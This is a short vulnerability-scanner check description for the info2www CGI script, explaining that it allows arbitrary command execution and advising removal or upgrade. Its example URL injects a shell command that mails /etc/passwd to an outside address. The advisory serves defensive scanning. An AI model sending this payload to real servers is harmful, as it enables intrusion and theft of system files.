|
Family: CGI abuses --> Category: infos
info2www Vulnerability Scan
Vulnerability Scan Summary Searches for the existence of /cgi-bin/info2www
Detailed Explanation for this Vulnerability Test
The 'info2www' CGI is installed. This CGI has
a well documented security flaw that lets a possible hacker execute arbitrary
commands with the rights of the http daemon (usually root or nobody).
Example:
http://target/cgi-bin/info2www?'(../../../bin/mail your@email < /etc/passwd|)'
Solution : Remove it from /cgi-bin or upgrade.
Threat Level: High
Click HERE for more information and discussions on this network vulnerability scan.
|